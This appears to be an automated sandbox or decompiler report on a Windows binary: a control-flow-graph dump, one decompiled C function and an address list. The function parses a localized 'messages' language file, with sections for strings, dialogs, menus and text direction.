                                                                                                            control_flow_graph 1073 7ff650b538f8-7ff650b53946 call 7ff650b69cb0 call 7ff650b6c330 1078 7ff650b53948-7ff650b53981 GetModuleFileNameW call 7ff650b4511c call 7ff650b5a368 1073->1078 1079 7ff650b53983-7ff650b53993 call 7ff650b5a390 1073->1079 1083 7ff650b53998-7ff650b539b3 call 7ff650b31c28 call 7ff650b321c0 1078->1083 1079->1083 1089 7ff650b539b8-7ff650b539ba 1083->1089 1090 7ff650b54232-7ff650b54264 call 7ff650b31c70 call 7ff650b69d10 1089->1090 1091 7ff650b539c0-7ff650b539ce 1089->1091 1092 7ff650b539f2-7ff650b53a2e call 7ff650b6eec0 * 2 1091->1092 1093 7ff650b539d0-7ff650b539f0 call 7ff650b50e20 * 2 1091->1093 1106 7ff650b53a31-7ff650b53a35 1092->1106 1093->1092 1107 7ff650b53a3b-7ff650b53a70 call 7ff650b32890 call 7ff650b32500 1106->1107 1108 7ff650b53b31-7ff650b53b50 call 7ff650b32730 call 7ff650b6ede0 1106->1108 1117 7ff650b53afc-7ff650b53b21 call 7ff650b32730 1107->1117 1118 7ff650b53a76 1107->1118 1108->1090 1119 7ff650b53b56-7ff650b53b73 call 7ff650b32500 1108->1119 1117->1106 1130 7ff650b53b27-7ff650b53b2b 1117->1130 1120 7ff650b53a7d-7ff650b53a81 1118->1120 1127 7ff650b53b75-7ff650b53b7d 1119->1127 1128 7ff650b53b90-7ff650b53ba3 call 7ff650b6ede0 1119->1128 1124 7ff650b53aac-7ff650b53ab1 1120->1124 1125 7ff650b53a83-7ff650b53a87 1120->1125 1131 7ff650b53ae2-7ff650b53aea 1124->1131 1132 7ff650b53ab3-7ff650b53ab8 1124->1132 1125->1124 1129 7ff650b53a89-7ff650b53aa1 call 7ff650b724e0 1125->1129 1133 7ff650b53bc7-7ff650b53c09 call 7ff650b5a2a8 call 7ff650b6ede0 1127->1133 1128->1090 1143 7ff650b53ba9-7ff650b53bc4 call 7ff650b5d098 call 7ff650b6edd8 1128->1143 1144 7ff650b53af3 1129->1144 1145 7ff650b53aa3-7ff650b53aa8 1129->1145 1130->1090 1130->1108 1134 7ff650b53aec-7ff650b53af1 1131->1134 1135 7ff650b53af7 1131->1135 1132->1131 1138 7ff650b53aba-7ff650b53abf 1132->1138 1155 7ff650b53c0b-7ff650b53c13 call 7ff650b6edd8 1133->1155 1156 7ff650b53c18-7ff650b53c35 1133->1156 1134->1120 1135->1117 1138->1131 1142 7ff650b53ac1-7ff650b53ad8 call 7ff650b71950 1138->1142 1151 7ff650b53ade 1142->1151 1152 7ff650b53b7f-7ff650b53b8b 1142->1152 1143->1133 1144->1135 1145->1124 1151->1131 1152->1117 1155->1090 1159 7ff650b53c3b-7ff650b53c48 1156->1159 1160 7ff650b540f0-7ff650b540f3 1156->1160 1163 7ff650b53f7e-7ff650b53f89 1159->1163 1164 7ff650b53c4e-7ff650b53c54 1159->1164 1165 7ff650b540fb-7ff650b54103 1160->1165 1170 7ff650b540f5 1163->1170 1171 7ff650b53f8f-7ff650b53f99 1163->1171 1168 7ff650b53c56-7ff650b53c5c 1164->1168 1169 7ff650b53c62-7ff650b53c68 1164->1169 1166 7ff650b54109-7ff650b54124 call 7ff650b74824 1165->1166 1167 7ff650b541ae-7ff650b541c6 call 7ff650b6edd8 * 2 1165->1167 1187 7ff650b54166-7ff650b541a9 call 7ff650b747a0 call 7ff650b5426c 1166->1187 1188 7ff650b54126-7ff650b5412e 1166->1188 1210 7ff650b541eb-7ff650b54231 call 7ff650b6eec0 * 2 1167->1210 1211 7ff650b541c8-7ff650b541e9 call 7ff650b50e20 * 2 1167->1211 1168->1163 1168->1169 1174 7ff650b53e42-7ff650b53e52 call 7ff650b59f2c 1169->1174 1175 7ff650b53c6e-7ff650b53cb6 1169->1175 1170->1165 1176 7ff650b53f9b-7ff650b53fa1 1171->1176 1177 7ff650b53ff9-7ff650b53ffd 1171->1177 1207 7ff650b53f68-7ff650b53f7a 1174->1207 1208 7ff650b53e58-7ff650b53e86 call 7ff650b5a390 call 7ff650b7197c 1174->1208 1182 7ff650b53cbb-7ff650b53cbe 1175->1182 1183 7ff650b53fa7-7ff650b53faf 1176->1183 1184 7ff650b53d39-7ff650b53d44 1176->1184 1180 7ff650b5401d-7ff650b54023 1177->1180 1181 7ff650b53fff-7ff650b54003 1177->1181 1192 7ff650b540d7 1180->1192 1193 7ff650b54029-7ff650b54045 call 7ff650b74824 1180->1193 1181->1180 1190 7ff650b54005-7ff650b5400b 1181->1190 1191 7ff650b53cc2-7ff650b53cca 1182->1191 1194 7ff650b53fe5 1183->1194 1195 7ff650b53fb1-7ff650b53fb5 1183->1195 1184->1165 1189 7ff650b53d4a-7ff650b53d53 1184->1189 1187->1167 1199 7ff650b54134-7ff650b54138 1188->1199 1189->1159 1190->1184 1200 7ff650b54011-7ff650b54018 1190->1200 1191->1191 1201 7ff650b53ccc-7ff650b53ce2 call 7ff650b71950 1191->1201 1203 7ff650b540dd-7ff650b540e9 1192->1203 1225 7ff650b54087 1193->1225 1226 7ff650b54047-7ff650b5404f 1193->1226 1198 7ff650b53fea-7ff650b53ff2 1194->1198 1205 7ff650b53fb7-7ff650b53fbb 1195->1205 1206 7ff650b53fde-7ff650b53fe3 1195->1206 1198->1177 1212 7ff650b5413a-7ff650b5413e 1199->1212 1213 7ff650b54140-7ff650b5414b 1199->1213 1234 7ff650b53cfd 1201->1234 1235 7ff650b53ce4-7ff650b53cef 1201->1235 1203->1160 1217 7ff650b53fbd-7ff650b53fc1 1205->1217 1218 7ff650b53fd7-7ff650b53fdc 1205->1218 1206->1198 1207->1163 1208->1207 1249 7ff650b53e8c-7ff650b53f1b call 7ff650b5d390 call 7ff650b5a2a8 call 7ff650b5a26c call 7ff650b5a2a8 call 7ff650b7184c 1208->1249 1210->1090 1211->1210 1212->1213 1221 7ff650b5414d-7ff650b54156 1212->1221 1213->1199 1213->1221 1227 7ff650b53fc3-7ff650b53fc7 1217->1227 1228 7ff650b53fd0-7ff650b53fd5 1217->1228 1218->1198 1221->1187 1232 7ff650b54158-7ff650b5415e 1221->1232 1231 7ff650b5408d-7ff650b540d5 call 7ff650b747a0 call 7ff650b5426c 1225->1231 1236 7ff650b54054-7ff650b54058 1226->1236 1227->1200 1237 7ff650b53fc9-7ff650b53fce 1227->1237 1228->1198 1231->1203 1232->1187 1244 7ff650b54160 1232->1244 1240 7ff650b53d01-7ff650b53d18 1234->1240 1235->1234 1246 7ff650b53cf1-7ff650b53cfb 1235->1246 1238 7ff650b5405a-7ff650b5405d 1236->1238 1239 7ff650b5405f-7ff650b5406a 1236->1239 1237->1198 1238->1239 1247 7ff650b5406c-7ff650b54075 1238->1247 1239->1236 1239->1247 1240->1182 1248 7ff650b53d1a-7ff650b53d1c 1240->1248 1244->1187 1246->1240 1247->1231 1253 7ff650b54077-7ff650b5407d 1247->1253 1254 7ff650b53d58 1248->1254 1255 7ff650b53d1e-7ff650b53d30 call 7ff650b5a2a8 1248->1255 1290 7ff650b53f1d-7ff650b53f2d 1249->1290 1291 7ff650b53f31-7ff650b53f44 1249->1291 1253->1231 1258 7ff650b5407f-7ff650b54085 1253->1258 1254->1174 1261 7ff650b53d5e 1254->1261 1263 7ff650b53d35 1255->1263 1258->1231 1265 7ff650b53d63-7ff650b53d6f 1261->1265 1263->1184 1267 7ff650b53d76-7ff650b53d79 1265->1267 1268 7ff650b53d71-7ff650b53d74 1265->1268 1267->1265 1268->1267 1270 7ff650b53d7b-7ff650b53d82 1268->1270 1272 7ff650b53dab-7ff650b53db9 1270->1272 1273 7ff650b53d84-7ff650b53d8e 1270->1273 1274 7ff650b54265-7ff650b5426b call 7ff650b69e64 1272->1274 1275 7ff650b53dbf-7ff650b53dea call 7ff650b5d390 1272->1275 1277 7ff650b53d91-7ff650b53d95 1273->1277 1285 7ff650b53dec-7ff650b53e0b call 7ff650b719b4 1275->1285 1286 7ff650b53e10-7ff650b53e3d call 7ff650b542b0 1275->1286 1277->1272 1278 7ff650b53d97-7ff650b53da9 1277->1278 1278->1272 1278->1277 1285->1263 1286->1174 1290->1291 1292 7ff650b53f4a-7ff650b53f50 1291->1292 1295 7ff650b53f59-7ff650b53f5c 1292->1295 1296 7ff650b53f52-7ff650b53f57 1292->1296 1295->1292 1296->1295 1297 7ff650b53f5e 1296->1297 1297->1207
                                                                                                            C-Code - Quality: 58%
                                                                                                            			E00007FF67FF650B538F8(void* __esi, void* __rax, signed long long __rbx, intOrPtr* __rcx, void* __rdx, void* __r8, void* __r10) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r13;
				void* __r15;
				void* _t215;
				void* _t223;
				void* _t232;
				signed int _t233;
				signed int _t234;
				void* _t244;
				void* _t247;
				signed int _t252;
				signed int _t270;
				signed int _t278;
				signed int _t286;
				void* _t290;
				void* _t297;
				void* _t298;
				void* _t326;
				void* _t355;
				void* _t362;
				signed long long _t370;
				signed long long _t371;
				void* _t374;
				signed long long _t376;
				void* _t381;
				short* _t382;
				long long _t386;
				short* _t388;
				long long _t390;
				short* _t392;
				long long _t394;
				signed long long _t396;
				intOrPtr* _t422;
				signed long long _t425;
				signed short* _t429;
				void* _t478;
				intOrPtr _t479;
				void* _t480;
				char* _t499;
				void* _t500;
				signed long long _t501;
				void* _t503;
				signed long long _t506;
				void* _t507;
				signed long long _t509;
				signed long long _t510;
				signed long long _t511;
				signed long long _t512;
				signed long long _t514;
				int _t517;
				signed long long _t520;
				signed long long _t521;
				char* _t523;
				void* _t524;
				void* _t526;
				signed long long _t527;
				void* _t529;
				void* _t535;
				void* _t541;
				void* _t542;
				void* _t543;
				void* _t545;
				void* _t546;
				long _t548;
				unsigned long long _t549;
				signed long long _t550;
				signed long long _t552;
				signed long long _t553;
				signed long long _t554;
				WCHAR* _t561;
				signed long long _t563;
				struct HINSTANCE__* _t565;
				intOrPtr* _t566;

				_t541 = __r10;
				_t529 = __r8;
				_t396 = __rbx;
				_t290 = __esi;
				 *((long long*)(_t526 + 0x18)) = __rbx;
				_t524 = _t526 - 0x41e0;
				E00007FF67FF650B69CB0(0x42e0, __rax, __r10, _t542);
				_t527 = _t526 - __rax;
				_t370 =  *0x50b978f0; // 0x27db226282f1
				_t371 = _t370 ^ _t527;
				 *(_t524 + 0x41d0) = _t371;
				_t500 = __rdx;
				_t566 = __rcx;
				E00007FF67FF650B6C330(0x5c, __rdx, _t535);
				if (_t371 != 0) goto 0x50b53983;
				r8d = 0x800;
				E00007FF67FF650B4511C(GetModuleFileNameW(_t565, _t561, _t548), _t371, _t524 + 0x11d0);
				 *_t371 = 0;
				r8d = 0x800;
				E00007FF67FF650B5A368(_t371, _t524 + 0x11d0, _t529);
				goto 0x50b53998;
				r8d = 0x800;
				E00007FF67FF650B5A390(_t524 + 0x11d0, _t500, _t529);
				E00007FF67FF650B31C28(_t524 - 0x80);
				r8d = 4;
				_t215 = E00007FF67FF650B321C0(_t371, __rbx, _t524 - 0x80, _t524 + 0x11d0); // executed
				if (_t215 == 0) goto 0x50b54232;
				_t501 = _t396;
				_t518 = _t566 + 0x28;
				_t297 =  *0x50b96e10 - _t396; // 0x18c
				if (_t297 <= 0) goto 0x50b539f2;
				E00007FF67FF650B50E20(_t396, _t566, _t501);
				E00007FF67FF650B50E20(_t396, _t566 + 0x28, _t501);
				_t298 = _t501 + 1 -  *0x50b96e10; // 0x18c
				if (_t298 < 0) goto 0x50b539d0;
				r8d = 8;
				E00007FF67FF650B6EEC0(_t396,  *_t566,  *((intOrPtr*)(_t566 + 8)), _t501 + 1, _t566 + 0x28, _t529, 0x7ff650b534a0, _t548, _t566);
				r8d = 8;
				E00007FF67FF650B6EEC0(_t396,  *((intOrPtr*)(_t566 + 0x28)),  *((intOrPtr*)(_t566 + 0x30)), _t501 + 1, _t518, _t529, 0x7ff650b533a0, _t548, _t566);
				dil = 0;
				 *((char*)(_t527 + 0x30)) = 0;
				r14d = r14d | 0xffffffff;
				r13d = 0;
				if (r14d != 0xffffffff) goto 0x50b53b31;
				E00007FF67FF650B32890(0x5c, _t396, _t524 - 0x80, _t518);
				r8d = 0x2000;
				E00007FF67FF650B32500(_t290, _t396, _t524 - 0x80, _t524 + 0x21d0, _t529, 0x7ff650b533a0);
				 *(_t527 + 0x40) = _t371;
				_t21 = _t371 - 0x10; // -16
				_t270 = _t21;
				 *(_t527 + 0x38) = _t270;
				if (_t270 < 0) goto 0x50b53afc;
				_t503 = _t524 + 0x21d4;
				if ( *((char*)(_t503 - 4)) != 0x2a) goto 0x50b53aac;
				if ( *((char*)(_t503 - 3)) != 0x2a) goto 0x50b53aac;
				r8d = 0xb;
				_t223 = E00007FF67FF650B724E0(_t270, _t503 - 2, "*messages***", _t529);
				if (_t223 == 0) goto 0x50b53af3;
				if ( *((short*)(_t503 - 4)) != 0x2a) goto 0x50b53ae2;
				if ( *((short*)(_t503 - 2)) != 0x2a) goto 0x50b53ae2;
				if (_t290 - _t223 + 0xffffffe0 > 0) goto 0x50b53ae2;
				r8d = 0xb;
				if (E00007FF67FF650B71950(_t529) == 0) goto 0x50b53b7f;
				_t520 = _t396 + 1;
				if (_t290 -  *(_t527 + 0x38) > 0) goto 0x50b53af7;
				goto 0x50b53a7d;
				r14d = _t520 + _t371;
				dil =  *((intOrPtr*)(_t527 + 0x30));
				_t374 = r12d;
				r8d = 0;
				E00007FF67FF650B32730( *(_t527 + 0x38), 0x5c, _t290 -  *(_t527 + 0x38), _t374, _t524 - 0x80,  *(_t527 + 0x40) + 0xfffffff0 + _t374, _t529);
				r13d = r13d + 1;
				if (r13d - 0x100 < 0) goto 0x50b53a31;
				if (r14d == 0xffffffff) goto 0x50b54232;
				r8d = 0;
				E00007FF67FF650B32730( *(_t527 + 0x38), 0x5c, r14d - 0xffffffff, _t374, _t524 - 0x80, r14d, _t529);
				0x50b6ede0();
				_t545 = _t374;
				if (_t374 == 0) goto 0x50b54232;
				r8d = 0x200000;
				_t549 = E00007FF67FF650B32500(_t290, _t396, _t524 - 0x80, _t374, _t529, 0x7ff650b533a0);
				 *(_t527 + 0x50) = _t549;
				if (dil == 0) goto 0x50b53b90;
				_t550 = _t549 >> 1;
				 *(_t527 + 0x50) = _t550;
				goto 0x50b53bc7;
				dil = 1;
				 *((intOrPtr*)(_t527 + 0x30)) = dil;
				r14d = _t520 + _t545;
				goto 0x50b53afc;
				0x50b6ede0();
				if (_t374 == 0) goto 0x50b54232;
				 *((char*)(_t545 + _t550)) = 0;
				_t46 = _t550 + 1; // 0x1
				E00007FF67FF650B5D098(0, _t396, _t545, _t374, _t520, _t46, _t543);
				0x50b6edd8();
				_t546 = _t374;
				_t376 =  >  ? _t545 : _t550;
				 *((short*)(_t546 + _t376 * 2)) = 0;
				r8d = 0x64;
				_t478 = "s:";
				E00007FF67FF650B5A2A8(_t524 + 0x1090, _t478, _t46);
				0x50b6ede0();
				 *(_t527 + 0x58) = _t376;
				if (_t376 != 0) goto 0x50b53c18;
				0x50b6edd8();
				goto 0x50b54232;
				 *((char*)(_t524 + 0xfe0)) = 0;
				 *((intOrPtr*)(_t527 + 0x34)) = 0;
				_t506 = _t396;
				_t53 = _t478 - 0x19; // 0x9
				r8d = _t53;
				if (_t550 == 0) goto 0x50b540f0;
				r9d = 0xa;
				r10d = 0x7ff650b533a3;
				if (_t506 == 0) goto 0x50b53f7e;
				if ( *((intOrPtr*)(_t546 + _t506 * 2 - 2)) == r10w) goto 0x50b53c62;
				if ( *((intOrPtr*)(_t546 + _t506 * 2 - 2)) != r9w) goto 0x50b53f7e;
				if ( *((short*)(_t546 + _t506 * 2)) != 0x3a) goto 0x50b53e42;
				 *(_t527 + 0x38) =  *(_t527 + 0x38) | 0xffffffff;
				 *((long long*)(_t524 + 0xfc0)) = L"STRINGS";
				 *((long long*)(_t524 + 0xfc8)) = L"DIALOG";
				 *((long long*)(_t524 + 0xfd0)) = L"MENU";
				 *((long long*)(_t524 + 0xfd8)) = L"DIRECTION";
				 *(_t527 + 0x40) = 0;
				_t70 = _t524 + 0xfc0; // 0xfe2
				_t422 = _t70;
				 *((long long*)(_t527 + 0x48)) = _t422;
				_t479 =  *_t422;
				_t552 = (_t550 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t479 + _t552 * 2)) != 0) goto 0x50b53cc2;
				_t232 = E00007FF67FF650B71950(_t552);
				_t233 =  *(_t527 + 0x40);
				if (_t232 != 0) goto 0x50b53cfd;
				_t425 = _t506 + _t552;
				if ( *((short*)(_t546 + 2 + _t425 * 2)) - 0x20 > 0) goto 0x50b53cfd;
				 *(_t527 + 0x38) = _t233;
				_t507 = _t425 + 1;
				goto 0x50b53d01;
				_t234 = _t233 + 1;
				 *(_t527 + 0x40) = _t234;
				 *((long long*)(_t527 + 0x48)) =  *((intOrPtr*)(_t527 + 0x48)) + 8;
				if (_t234 - 4 < 0) goto 0x50b53cbb;
				if ( *(_t527 + 0x38) != 0) goto 0x50b53d58;
				_t88 = _t479 + 0x64; // 0x163
				r8d = _t88;
				_t480 = "s:";
				_t89 = _t524 + 0x1090; // 0x10b2
				E00007FF67FF650B5A2A8(_t89, _t480, _t552);
				r13d = 0x22;
				_t326 = _t507 -  *(_t527 + 0x50);
				if (_t326 >= 0) goto 0x50b540fb;
				_t92 = _t480 - 0x19; // 0x9
				r8d = _t92;
				goto 0x50b53c3b;
				if (_t326 <= 0) goto 0x50b53e42;
				_t381 = _t507 + _t507;
				_t429 = _t381 + _t546;
				if ( *_t429 == 0x20) goto 0x50b53d76;
				if ( *_t429 != 9) goto 0x50b53d7b;
				goto 0x50b53d63;
				_t553 = _t396;
				if ( *_t429 - 0x20 <= 0) goto 0x50b53dab;
				_t95 = _t524 + 0x1100; // 0x1122
				if (_t553 - 0x63 >= 0) goto 0x50b53dab;
				 *((short*)(_t95 - _t381 - _t546 + _t429)) =  *_t429 & 0x0000ffff;
				_t554 = _t553 + 1;
				if (_t429[1] - 0x20 > 0) goto 0x50b53d91;
				_t382 = _t554 * 2;
				if (_t382 - 0xc8 >= 0) goto 0x50b54265;
				 *((short*)(_t524 + _t382 + 0x1100)) = 0;
				r8d = 0x64;
				_t100 = _t524 + 0x1020; // 0x1042
				_t101 = _t524 + 0x1100; // 0x1122
				E00007FF67FF650B5D390(0, _t396, _t101, _t100, _t552);
				_t509 = _t507 + 1 + _t554;
				if ( *(_t527 + 0x38) != 3) goto 0x50b53e10;
				_t103 = _t524 + 0x1100; // 0x1122
				 *((char*)(_t566 + 0xc8)) = E00007FF67FF650B719B4( *(_t527 + 0x38) - 3, _t103, L"RTL") & 0xffffff00 | _t240 == 0x00000000;
				goto 0x50b53d35;
				_t533 =  ==  ? "$%s:" : "@%s:";
				_t107 = _t524 + 0x1020; // 0x1042
				_t108 = _t524 + 0x1090; // 0x10b2
				snprintf(_t499, _t517, _t523);
				goto 0x50b53d35;
				if (E00007FF67FF650B59F2C(_t108) == 0) goto 0x50b53f68;
				r8d = 0x64;
				_t111 = _t524 + 0x21d0; // 0x21f2
				_t244 = E00007FF67FF650B5A390(_t111, _t546 + _t509 * 2,  ==  ? "$%s:" : "@%s:");
				_t112 = _t524 + 0x21d0; // 0x21f2
				E00007FF67FF650B7197C(_t244, _t112, L" \t,");
				if (_t382 == 0) goto 0x50b53f68;
				 *_t382 = 0;
				r8d = 0x64;
				_t113 = _t524 + 0x1100; // 0x1122
				_t114 = _t524 + 0x21d0; // 0x21f2
				E00007FF67FF650B5D390(0, _t396, _t114, _t113,  ==  ? "$%s:" : "@%s:");
				r8d = 0x64;
				_t115 = _t524 + 0x1090; // 0x10b2
				_t116 = _t524 + 0x1020; // 0x1042
				_t247 = E00007FF67FF650B5A2A8(_t116, _t115,  ==  ? "$%s:" : "@%s:");
				r8d = 0x64;
				_t117 = _t524 + 0x1100; // 0x1122
				_t118 = _t524 + 0x1020; // 0x1042
				E00007FF67FF650B5A26C(_t247, _t382, _t118, _t117,  ==  ? "$%s:" : "@%s:");
				r8d = 0x32;
				_t119 = _t524 + 0x1020; // 0x1042
				_t120 = _t524 + 0xfe0; // 0x1002
				E00007FF67FF650B5A2A8(_t120, _t119, _t533);
				 *((long long*)(_t527 + 0x20)) = 0x7ff650b535a0;
				r9d = 8;
				_t124 = _t524 + 0x1020; // 0x1042
				E00007FF67FF650B7184C(_t396, _t124,  *_t566, _t509, _t520, _t524,  *((intOrPtr*)(_t566 + 8)), _t107);
				if (0x7ff650b535a0 == 0) goto 0x50b53f31;
				 *((intOrPtr*)(_t527 + 0x34)) =  *((intOrPtr*)(0x50b95550 + ( *((intOrPtr*)(0x7ff650b535a0)) +  *((intOrPtr*)(0x7ff650b535a0))) * 8));
				_t128 = _t524 + 0x21d0; // 0x21f2
				_t386 = _t128;
				_t510 = _t509 + (_t382 - _t386 >> 1) + 1;
				r14d = 9;
				if ( *((short*)(_t546 + _t510 * 2)) == 0x20) goto 0x50b53f59;
				if ( *((intOrPtr*)(_t546 + _t510 * 2)) != r14w) goto 0x50b53f5e;
				_t511 = _t510 + 1;
				goto 0x50b53f4a;
				_t563 =  *(_t527 + 0x58);
				goto 0x50b53d35;
				r10d = 0xd;
				r9d = _t541 - 3;
				r8d = _t541 - 4;
				_t286 = _t541 + 0x15;
				_t278 =  *(_t546 + _t511 * 2) & 0x0000ffff;
				_t512 = _t511 + 1;
				if (_t278 == 0) goto 0x50b540f5;
				r11d = 0x5c;
				if (_t278 != r11w) goto 0x50b53ff9;
				if (0 - 0x10000 >= 0) goto 0x50b53d39;
				_t252 =  *(_t546 + _t512 * 2) & 0x0000ffff;
				if (_t252 == _t286) goto 0x50b53fe5;
				if (_t252 == r11w) goto 0x50b53fde;
				if (_t252 == 0x6e) goto 0x50b53fd7;
				if (_t252 == 0x72) goto 0x50b53fd0;
				if (_t252 != 0x74) goto 0x50b54011;
				 *(_t563 + _t520 * 2) = r8w;
				goto 0x50b53fea;
				 *(_t563 + _t520 * 2) = r10w;
				goto 0x50b53fea;
				 *(_t563 + _t520 * 2) = r9w;
				goto 0x50b53fea;
				 *(_t563 + _t520 * 2) = r11w;
				goto 0x50b53fea;
				 *(_t563 + _t520 * 2) = _t286;
				goto 0x50b53d35;
				if (_t278 == r10w) goto 0x50b5401d;
				if (_t278 == r9w) goto 0x50b5401d;
				if (1 - 0x10000 >= 0) goto 0x50b53d39;
				 *(_t563 + _t520 * 2) = _t278;
				goto 0x50b53d35;
				if ( *((intOrPtr*)(_t524 + 0xfe0)) == 0) goto 0x50b540d7;
				 *((intOrPtr*)(_t524 + 0xfc0)) = 1;
				E00007FF67FF650B74824(_t396, _t524 + 0xfe0, _t520);
				 *((long long*)(_t524 + 0xfc8)) = _t386;
				if (_t520 == 0) goto 0x50b54087;
				_t158 = _t520 - 1; // -1
				_t388 = _t563 + _t158 * 2;
				if ( *_t388 == 0x20) goto 0x50b5405f;
				_t355 =  *_t388 - 9;
				if (_t355 != 0) goto 0x50b5406c;
				 *_t388 = 0;
				_t521 = _t520 - 1;
				if (_t355 != 0) goto 0x50b54054;
				r13d = 0x22;
				if (_t521 == 0) goto 0x50b5408d;
				if ( *((intOrPtr*)(_t563 + _t521 * 2 - 2)) != r13w) goto 0x50b5408d;
				 *((short*)(_t563 + _t521 * 2 - 2)) = 0;
				goto 0x50b5408d;
				r13d = 0x22;
				 *((short*)(_t563 + _t521 * 2)) = 0;
				_t169 = _t563 + 2; // 0x2
				_t390 = _t169;
				_t445 =  ==  ? _t390 : _t563;
				E00007FF67FF650B747A0(_t396,  ==  ? _t390 : _t563, _t521, _t524);
				 *((long long*)(_t524 + 0xfd0)) = _t390;
				asm("movups xmm0, [ebp+0xfc0]");
				asm("movaps [esp+0x60], xmm0");
				asm("movsd xmm1, [ebp+0xfd0]");
				asm("movsd [esp+0x70], xmm1");
				E00007FF67FF650B5426C(_t396, _t566 + 0x50, _t527 + 0x60);
				goto 0x50b540dd;
				r13d = 0x22;
				 *((char*)(_t524 + 0xfe0)) = 0;
				 *((intOrPtr*)(_t527 + 0x34)) = 0;
				goto 0x50b53d3f;
				r13d = 9;
				goto 0x50b540fb;
				r13d = 0x22;
				if ( *((intOrPtr*)(_t524 + 0xfe0)) == 0) goto 0x50b541ae;
				 *((intOrPtr*)(_t524 + 0xfc0)) = 0;
				_t177 = _t524 + 0xfe0; // 0x1002
				E00007FF67FF650B74824(_t396, _t177, _t521);
				 *((long long*)(_t524 + 0xfc8)) = _t390;
				if (0 == 0) goto 0x50b54166;
				_t179 = _t521 - 1; // -1
				_t392 = _t563 + _t179 * 2;
				r13d = 9;
				if ( *_t392 == 0x20) goto 0x50b54140;
				_t362 =  *_t392 - r13w;
				if (_t362 != 0) goto 0x50b5414d;
				 *_t392 = 0;
				_t514 = _t512 + 1 - 1;
				if (_t362 != 0) goto 0x50b54134;
				r13d = 0x22;
				if (_t514 == 0) goto 0x50b54166;
				if ( *((intOrPtr*)(_t563 + _t514 * 2 - 2)) != r13w) goto 0x50b54166;
				 *((short*)(_t563 + _t514 * 2 - 2)) = 0;
				 *((short*)(_t563 + _t514 * 2)) = 0;
				_t190 = _t563 + 2; // 0x2
				_t394 = _t190;
				_t449 =  ==  ? _t394 : _t563;
				E00007FF67FF650B747A0(_t396,  ==  ? _t394 : _t563, _t521, _t524);
				 *((long long*)(_t524 + 0xfd0)) = _t394;
				asm("movups xmm0, [ebp+0xfc0]");
				asm("movaps [esp+0x60], xmm0");
				asm("movsd xmm1, [ebp+0xfd0]");
				asm("movsd [esp+0x70], xmm1");
				E00007FF67FF650B5426C(_t396, _t566 + 0x50, _t527 + 0x60);
				0x50b6edd8();
				0x50b6edd8();
				_t515 = _t566 + 0x78;
				if ( *((intOrPtr*)(_t566 + 0x58)) - _t396 <= 0) goto 0x50b541eb;
				E00007FF67FF650B50E20(_t396, _t566 + 0x78, _t396);
				E00007FF67FF650B50E20(_t396, _t566 + 0xa0, _t396);
				if (_t396 + 1 -  *((intOrPtr*)(_t566 + 0x58)) < 0) goto 0x50b541c8;
				 *0x50ba7ad8 =  *((intOrPtr*)(_t566 + 0x50));
				r8d = 8;
				E00007FF67FF650B6EEC0(_t396 + 1,  *((intOrPtr*)(_t566 + 0x78)),  *((intOrPtr*)(_t566 + 0x80)), _t566 + 0x78, _t521,  *((intOrPtr*)(_t566 + 8)), 0x7ff650b535d0, (_t382 - _t386 >> 1) + 1, _t566);
				r8d = 8;
				E00007FF67FF650B6EEC0(_t396 + 1,  *((intOrPtr*)(_t566 + 0xa0)),  *((intOrPtr*)(_t566 + 0xa8)), _t515, _t521,  *((intOrPtr*)(_t566 + 8)), 0x7ff650b53600, (_t382 - _t386 >> 1) + 1, _t566);
				return E00007FF67FF650B69D10(E00007FF67FF650B31C70(_t524 - 0x80), _t278,  *(_t524 + 0x41d0) ^ _t527);
			}














































































                                                                                                            0x7ff650b538f8
                                                                                                            0x7ff650b538f8
                                                                                                            0x7ff650b538f8
                                                                                                            0x7ff650b538f8
                                                                                                            0x7ff650b538f8
                                                                                                            0x7ff650b53908
                                                                                                            0x7ff650b53915
                                                                                                            0x7ff650b5391a
                                                                                                            0x7ff650b5391d
                                                                                                            0x7ff650b53924
                                                                                                            0x7ff650b53927
                                                                                                            0x7ff650b5392e
                                                                                                            0x7ff650b53931
                                                                                                            0x7ff650b5393c
                                                                                                            0x7ff650b53946
                                                                                                            0x7ff650b53948
                                                                                                            0x7ff650b53964
                                                                                                            0x7ff650b53969
                                                                                                            0x7ff650b5396c
                                                                                                            0x7ff650b5397c
                                                                                                            0x7ff650b53981
                                                                                                            0x7ff650b53983
                                                                                                            0x7ff650b53993
                                                                                                            0x7ff650b5399c
                                                                                                            0x7ff650b539a2
                                                                                                            0x7ff650b539b3
                                                                                                            0x7ff650b539ba
                                                                                                            0x7ff650b539c0
                                                                                                            0x7ff650b539c3
                                                                                                            0x7ff650b539c7
                                                                                                            0x7ff650b539ce
                                                                                                            0x7ff650b539d6
                                                                                                            0x7ff650b539e1
                                                                                                            0x7ff650b539e9
                                                                                                            0x7ff650b539f0
                                                                                                            0x7ff650b539fe
                                                                                                            0x7ff650b53a08
                                                                                                            0x7ff650b53a14
                                                                                                            0x7ff650b53a1e
                                                                                                            0x7ff650b53a23
                                                                                                            0x7ff650b53a26
                                                                                                            0x7ff650b53a2a
                                                                                                            0x7ff650b53a2e
                                                                                                            0x7ff650b53a35
                                                                                                            0x7ff650b53a3f
                                                                                                            0x7ff650b53a47
                                                                                                            0x7ff650b53a58
                                                                                                            0x7ff650b53a5f
                                                                                                            0x7ff650b53a67
                                                                                                            0x7ff650b53a67
                                                                                                            0x7ff650b53a6a
                                                                                                            0x7ff650b53a70
                                                                                                            0x7ff650b53a76
                                                                                                            0x7ff650b53a81
                                                                                                            0x7ff650b53a87
                                                                                                            0x7ff650b53a8d
                                                                                                            0x7ff650b53a9a
                                                                                                            0x7ff650b53aa1
                                                                                                            0x7ff650b53ab1
                                                                                                            0x7ff650b53ab8
                                                                                                            0x7ff650b53abf
                                                                                                            0x7ff650b53ac1
                                                                                                            0x7ff650b53ad8
                                                                                                            0x7ff650b53ae2
                                                                                                            0x7ff650b53aea
                                                                                                            0x7ff650b53af1
                                                                                                            0x7ff650b53af3
                                                                                                            0x7ff650b53af7
                                                                                                            0x7ff650b53afc
                                                                                                            0x7ff650b53b0b
                                                                                                            0x7ff650b53b12
                                                                                                            0x7ff650b53b17
                                                                                                            0x7ff650b53b21
                                                                                                            0x7ff650b53b2b
                                                                                                            0x7ff650b53b34
                                                                                                            0x7ff650b53b3b
                                                                                                            0x7ff650b53b45
                                                                                                            0x7ff650b53b4a
                                                                                                            0x7ff650b53b50
                                                                                                            0x7ff650b53b56
                                                                                                            0x7ff650b53b68
                                                                                                            0x7ff650b53b6b
                                                                                                            0x7ff650b53b73
